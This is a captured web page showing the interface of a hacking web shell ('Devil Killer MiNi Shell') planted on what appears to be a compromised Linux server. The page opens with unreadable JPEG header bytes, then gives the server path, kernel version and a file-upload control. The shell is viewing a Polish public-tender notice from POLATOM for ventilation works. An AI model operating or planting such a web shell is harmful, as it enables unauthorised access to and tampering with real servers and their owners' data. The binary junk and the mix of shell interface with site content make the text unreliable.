JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200610/549778-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 549778-N-2020 z dnia 2020-06-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Narodowe Centrum Badań Jądrowych Ośrodek Radioizotopów POLATOM</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Modernizacja instalacji wentylacji w pomieszczeniach 7D i 11D</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Narodowe Centrum Badań Jądrowych Ośrodek Radioizotopów POLATOM</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">001024043</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Andrzeja Sołtana</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">24</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05-400</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Otwock</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 273 17 00, 22 273 19 60</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@polatom.pl, krzysztof.maletka@polatom.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 718 03 50</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.polatom.pl; www.platformazakupowa.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.polatom.pl; www.platformazakupowa.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytut Badawczy</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.polatom.pl; www.platformazakupowa.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.polatom.pl; www.platformazakupowa.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Tak</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne">www.polatom.pl; www.platformazakupowa.pl</span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Modernizacja instalacji wentylacji w pomieszczeniach 7D i 11D</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">12/P/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest wybudowanie wraz z uruchomieniem instalacji wentylacji mechanicznej dla pomieszczeń 11D i 7D w budynku 24ABCDW. Zadaniem instalacji będzie utrzymanie odpowiednich parametrów powietrza w pomieszczeniach (temperatura oraz wilgotność). Zakres prac będzie obejmował położenie kanałów wentylacyjnych wraz z armaturą i urządzeniami, wykonanie niezbędnych instalacji hydraulicznych i elektrycznych oraz prace remontowo budowlane tj. wykucia przejść, zamurowanie dziur, miejscowe i całościowe naprawy ścian, sufitów, podłóg wraz z gruntowaniem, malowaniem oraz demontaż istniejących urządzeń wentylacyjnych i sufitu podwieszanego wraz z montażem nowego sufitu w systemie farmaceutycznym. Szczegółowy opis robót zawiera Załącznik A.•	Załącznik A - Opis przedmiotu zamówienia - zawiera projekty techniczne wraz z uzupełnieniami, rysunkami i obmiarami.1A. „Projekt wentylacji w pom. 7D i 11D - sanitarny”2A. „Projekt wentylacji w pom. 7D i 11D - elektryczny”3A. „Uzupełnienie dla prac budowlano-instalacyjnych”4A. „Elektryka – 09D”5A. „Elektryka – 012D”6A. „Sufit farmaceutyczny – 7D”7A. „Sufit farmaceutyczny – 11D”8A. „Przedmiar roboty sanitarne, ogólnobudowlane i elektryczne”9A. „Przedmiar roboty elektryczne dla central”•	Załącznik B - Wymagania dotyczące Wykonawcy•	Załącznik C - Dodatkowe wymagania•	Załącznik D - RegulaminZamawiający załącza przedmiary robót jako materiał pomocniczy dla Wykonawcy- wynagrodzenie Wykonawcy ma charakter wynagrodzenia ryczałtowego i nie przysługuje jakiekolwiek wynagrodzenie dodatkowe.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45331210-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45453000-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">80</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający wymaga, aby Wykonawca był wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym posiada siedzibę. W Polsce rejestrami, o których mowa powyżej, są Krajowy Rejestr Sądowy oraz Centralna Ewidencja Informacji o Działalności Gospodarczej.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art.22 ust.1 ustawy PZP</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. ma doświadczenie w wykonywaniu zadań, polegających na montażu systemów wentylacji o podobnym zakresie i wartości co przedmiot zamówienia, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli czas prowadzenia działalności jest krótszy – w tym okresie. 2. dysponuje wykwalifikowanym personelem (dotyczy osoby odpowiedzialnej za kierowanie robotami budowlanymi), posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadającymi im uprawnieniami.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a)	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.b)	Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.c) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w celu potwierdzenia, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego zatrudnionych na umowę o pracę – minimum 4 osoby (pracownicy fizyczni). Ponadto Zamawiający wymaga osoby sprawującej funkcję kierowniczą.b)	Wykaz dwóch zadań polegających na wykonaniu montażu systemów wentylacji o podobnym zakresie co przedmiot zamówienia, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli czas prowadzenia działalności jest krótszy – w tym okresie, o wartości netto nie mniejszej niż 100 000,00 PLN (słownie: sto tysięcy złotych).Wykaz powinien zawierać daty, 